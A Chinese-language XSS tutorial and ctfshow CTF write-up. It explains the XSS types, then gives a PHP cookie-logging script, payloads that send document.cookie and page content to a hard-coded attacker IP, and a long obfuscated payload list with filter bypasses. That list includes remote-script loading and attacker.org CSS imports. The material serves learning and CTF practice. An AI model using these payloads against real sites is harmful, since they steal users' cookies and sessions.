XSS的本质是一种高级钓鱼手法。

认识XSS

XSS (Cross Site Scripting) 攻击全称跨站脚本攻击,是为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS。

XSS 是一种经常出现在 Web 应用中的计算机安全漏洞,它允许恶意 Web 用户将代码植入到提供给其它用户使用的页面中。

在XSS攻击中,一般有三个角色参与:攻击者、目标服务器、受害者的浏览器。

原理:将恶意的 script 脚本插入进 html/css/js 文件当中。

反射型XSS

反射型XSS,又称非持久型XSS。
之所以称为反射型XSS,是因为这种攻击方式的注入代码是从目标服务器通过错误信息、搜索结果等等方式“反射”回来的:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。
而称为非持久型XSS,则是因为这种攻击方式具有一次性,由于代码注入的是一个动态产生的页面而不是永久的页面,因此这种攻击方式只在点击链接的时候才产生作用。

特点:
① 不经过服务器存储,直接通过 HTTP 的 GET 和 POST 请求就能完成一次攻击,拿到用户隐私数据;
②攻击者需要诱骗点击;
③反馈率低,所以较难发现和响应修复;
④盗取用户敏感保密信息。

存储型XSS

存储型XSS,又称持久型XSS。
他和反射型XSS最大的不同就是,攻击脚本将被永久地存放在目标服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。
一般存在于 Form 表单提交等交互功能,如发帖留言,提交文本信息等,多见于论坛。黑客利用的 XSS 漏洞,将内容经正常功能提交进入数据库持久保存,当前端页面获得后端从数据库中读出的注入代码时,恰好将其渲染执行。
特点:
①持久性,植入在数据库中;
②危害面广,甚至可以让用户机器变成 DDoS 攻击的肉鸡;
③ 盗取用户敏感私密信息。

DOM型XSS

DOM型XSS 是基于文档对象模型 Document Objeet Model,DOM)的一种漏洞。对于img,input等这种类型的 DOM 节点标签,DOM型XSS就可以利用其进行攻击
DOM 型 XSS 全部都是由前端进行触发的。

例题:ctfshow web入门 316


输入什么就返回什么,尝试执行js代码<script>alert(1)</script>

成功返回了弹窗

本题的flag在管理员的cookie中,机器人会定时自动点击生成的链接

创建一个自动接收脚本a.php在vps上

1
2
3
4
5
6
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

生成Xss代码链接,用于获取管理员cookie

<body/**/onload="window.open('http://ip:port/index.php/?1='+document.cookie)"></body>

<body/**/onload="window.location.href='http://ip:port/index.php/?1='+document.cookie"></body>

<script>window.open("http://149.88.83.236:8000/a.php/?1="+document.cookie)</script>

python3 -m http.server监听即可拿到cookie

1
<script>window.open('http://149.88.83.236:8000/a.php'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
片段 说明
window.open(url) 在新窗口打开一个 URL(或发起 GET 请求)
'http://149.88.83.236:8000/a.php' 攻击者自己的服务器(用于收集数据)
document.getElementsByClassName(...)[1] 获取页面中 class 为 layui-table-cell laytable-cell-1-0-1 的第 2 个元素
.innerHTML 提取该元素的 HTML 内容,可能是 flag 或敏感数据
拼接成完整 URL 将敏感信息拼接到 URL 参数中传回给攻击者
1
<script>$('.layui-table-cell').each(function(index,value){{if(value.innerHTML.indexOf('ctfshow') > -1){window.open("http://149.88.83.236:8000/a.php/?1="+value.innerHTML);}}})</script>
  • 遍历所有 .layui-table-cell 元素
  • 判断其 innerHTML 是否包含 'ctfshow'( flag 的前缀)
  • 一旦匹配,就使用 window.open() 打开新窗口并带走 flag 内容

bypass

常规使用<script>alert(1)</script>

其次可以使用img body input

在 IMG 标签中,当给定的图片 URL 地址存在且图片加载完成,则触发onload事件。当给定的图片 URL 地址不存在或网络出错时,则触发onerror事件。

  1. 如果()被过滤,可以用//``替代
  2. 如果空格被过滤,可以用/**/绕过
  3. 如果<>被过滤,可以用%3c%3e替代
  4. 如果引号被过滤,可以用%27%22替代

payload集合

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#第一类:Javascript URL
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript:alert(1)">Hello</a>
<a href=javascript:alert("XSS")>link</a>
<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>
<a href=javascript:alert(String.fromCharCode(88,83,83))>link</a>
<a href="javascript&colon;alert(1)">link</a>
<a href="javaSCRIPT&colon;alert(1)">Hello</a>
<a href="javasc&NewLine;ript&colon;alert(1)">link</a>
<a href="javas&Tab;cript:\u0061lert(1);">Hello</a>
<a href="jav ascript:alert('XSS')">link</a>
<a href="jav&#x09;ascript:alert('XSS')">link</a>
<a href="jav&#x0D;ascript:alert('XSS')">link</a>
<a href="  javascript:alert('XSS');">link</a>
<a href="javascript:\u0061lert&#x28;1&#x29">Hello</a>
<a href="javascript:confirm`1`">link</a>
<a href="javascript:confirm(1)">link</a>
<a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">1</a>
<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>
<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a>
<a href=javascript:eval("alert('xss')")>link</a>
<a href=javascript:alert('XSS')>link</a>
<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>link</a>
<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>
<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a>
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a>
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

#第二类:CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
#第三类:Inline style

<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div>
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<div style="z:exp/*anything*/res/*here*/sion(alert(1))">
<div style=xss:expr/*XSS*/ession(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")>
<img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6
<img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">
<A STYLE='no\xss:noxss("*//*");xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

#第四类:JavaScript 事件
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src=1 onerror=alert(1)>
<img/src='1'/onerror=alert(0)>
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
<img src=1 onmouseover=alert('xss') a1=1111>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
<a href="#" onclick=alert('\170\163\163')>test</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a>
<a href="#" onclick="alert('xss')">link</a>
<marquee onscroll=alert(1)> test</marquee>
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('a')">123456 <br/><br/><br/><br/><br/></div>
<DIV onmousewheel="alert('a')" >123456</DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div style="background-color:red" onmouseenter="alert('a')">123456</div>
<DIV onmouseleave="alert('1')">123456</DIV>
<div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>
<marquee onstart="alert('a')" >asdf</marquee>
<div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div>
<div style="background-color:red;" onbeforecut="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div>
<div style="background-color:red;" ="true" onbeforepaste="alert('a')" >asdf</div>
<div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div>
<div style="background-color:red;" oncopy="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div>
<div style="background-color:red;" ondrag="alert('1')" >asdf</div>
<div style="background-color:red;" ondragend="alert('a')" >asdf</div>
<div style="background-color:red;" ondragenter="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div>
<div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div>
<div contentEditable="true" onbeforeactivate="alert('b')">asdf</div>
<div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div>
<div contentEditable="true" ondeactivate="alert('bem')">asdf</div>
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)">
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio>
<body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<input type="hidden" accesskey="X" onclick="alert(/xss/)">


#第五类:Script 标签
<script src="http://baidu.com"></script><script>Function(atob('YWxlcnQoInhzcyIp'))()</script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script>alert(/88199/)</script>
<script>alert(`a`)</script>
<script>alert('a')</script>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<script>eval(alert(1))</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout(alert(1),0)</script>
<script>setTimeout`alert\x28\x27 xss \x27\x29`</script>
<script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>

<script src=data:text/javascript,alert(1)></script>
<script src=&#100&#97&#116&#97:text/javascript,alert(1)></script>

<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074`a`</script>
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
<!--[if]><script>alert(1)</script -->

<script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
1、onmouseenter:当鼠标进入选区执行代码
<div style="123456</div>

2、onmouseleave:当鼠标离开选区执行代码
<DIV onmouseleave="alert('bem')" style="123456</DIV>

3、onmousewheel:当鼠标在选区滚轮时执行代码
<DIV onmousewheel="alert('bem')" style="123456</DIV>

4、onscroll:拖动滚动条执行代码
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('bem')">123456
</div>

5、onfocusin:当获得焦点时执行代码
<div contentEditable="true" style="asdf</div>

6、onfocusout:当失去焦点时执行代码
<div contentEditable="true" style="asdf</div>

7、onstart:当显示内容时执行代码
<marquee style="background-color:red" onstart="alert('bem')" >asdf</marquee>

8、onbeforecopy:选中内容后右键执行代码
<div style="" onbeforecopy="alert('bem')" >asdf</div>

9、onbeforecut:选中内容后右键执行代码
<div style="" onbeforecut="alert('bem')" >asdf</div>

10、onbeforeeditfocus:当获得焦点时执行代码
<div style="" contentEditable="true" onbeforeeditfocus="alert('bem')" >asdf</div>

11、onbeforepaste:选中内容后右键执行代码
<div style="" ="true" onbeforepaste="alert('bem')" >asdf</div>

12、oncontextmenu:鼠标右键执行代码
<div style="" oncontextmenu="alert('bem')" >asdf</div>

13、oncopy:鼠标右键执行复制时执行代码
<div style="" oncopy="alert('bem')" >asdf</div>

14、oncut:鼠标右键执行剪切时执行代码
<div contentEditable="true" style="" oncut="alert('bem')" >asdf</div>

15、ondrag:选择内容并拖动时执行代码
<div style="" ondrag="alert('bem')" >asdf</div>

16、ondragend:选择内容并拖动松开鼠标执行代码
<div style="" ondragend="alert('bem')" >asdf</div>

17、ondragenter:选择内容并拖动时执行代码
<div style="" ondragenter="alert('bem')" >asdf</div>

18、ondragleave:选择内容并拖出边框执行代码
<div contentEditable="true" style="" ondragleave="alert('bem')" >asdf</div>

19、ondragover:选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragover="alert('bem')" >asdf</div>

20、ondragstart:选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragstart="alert('bem')" >asdf</div>

21、ondrop:有内容被拖动进来时执行代码
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>

22、onlosecapture:选择内容时执行代码
<div contentEditable="true" style="" onlosecapture="alert('bem')" >asdf</div>

23、onpaste:粘贴时执行代码
<div contentEditable="true" style="" onpaste="alert('bem')" >asdf</div>

24、onselectstart:选择内容时执行代码
<div contentEditable="true" style="" onselectstart="alert('bem')" >asdf</div>

25、onhelp:进入焦点按F1时执行代码
<div contentEditable="true" style="" onhelp="alert('bem')" >asdf</div>

26、onEnd:当时间线执行完毕时执行代码
<div STYLE="behavior:url('#default#time2')" onEnd="alert('bem')">asdf</div>

27、onBegin:当时间线开始执行代码
<div STYLE="behavior:url('#default#time2')" onBegin="alert('bem')">asdf</div>

28、onactivate:激活当前标签时执行代码
<div contentEditable="true" STYLE="" onactivate="alert('bem')">asdf</div>

29、onfilterchange:当滤镜改变时执行代码
<div contentEditable="true" STYLE="filter: Alpha(opacity=100, style=2);" onfilterchange="alert('bem')">asdf</div>

30、onbeforeactivate:当激活当前标签时执行代码
<div contentEditable="true" STYLE="" onbeforeactivate="alert('bem')">asdf</div>

31、onbeforedeactivate:当标签内值改变时执行代码
<div contentEditable="true" STYLE="" onbeforedeactivate="alert('bem')">asdf</div>

32、ondeactivate:当标签内值改变时执行代码
<div contentEditable="true" STYLE="" ondeactivate="alert('bem')">asdf</div>

<a>标签
<a href=javascript:alert(1)>111</a>

<img>标签
<img src=https://www.baidu.com/img/flexible/logo/pc/result.png>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>

<input>标签
<input onmouseover=alert(1) />

<script>标签
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>

alert被过滤,可以prompt、confirm、console.log替换使用:
如果都被过滤,可以换个方式绕过

onmouseover=top[11189117..toString(32)](2222)
onmouseover=top[11189117..toString(32)](2222)
onmouseover="setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))"

onmousemove=top[11189117..toString(32)](2222)
onmouseover=top[11189117..toString(32)](2222)
onclick=……………………等等
onmousemove='alert(1111)'a="
<script>top[11189117..toString(32)](2222)</script>
<ScRiPt>top[11189117..toString(32)](2222)</ScRiPt>
%3cscript%3ealert(1111)%3c/script%3e
<Script>\u0061\u006C\u0065\u0072\u0074(1111)</Script>

<img src=java\0script:alert`1111`>
<img src=x onerror=alert`1111`>
%3Cimg+src%3Dx+onerror%3Dtop[11189117..toString(32)]%601111%60%3E

参考:
从0到1完全掌握 XSS
web攻防之XSS攻击详解——XSS简介与类型

XSS payload 大全 - Bypass - 博客园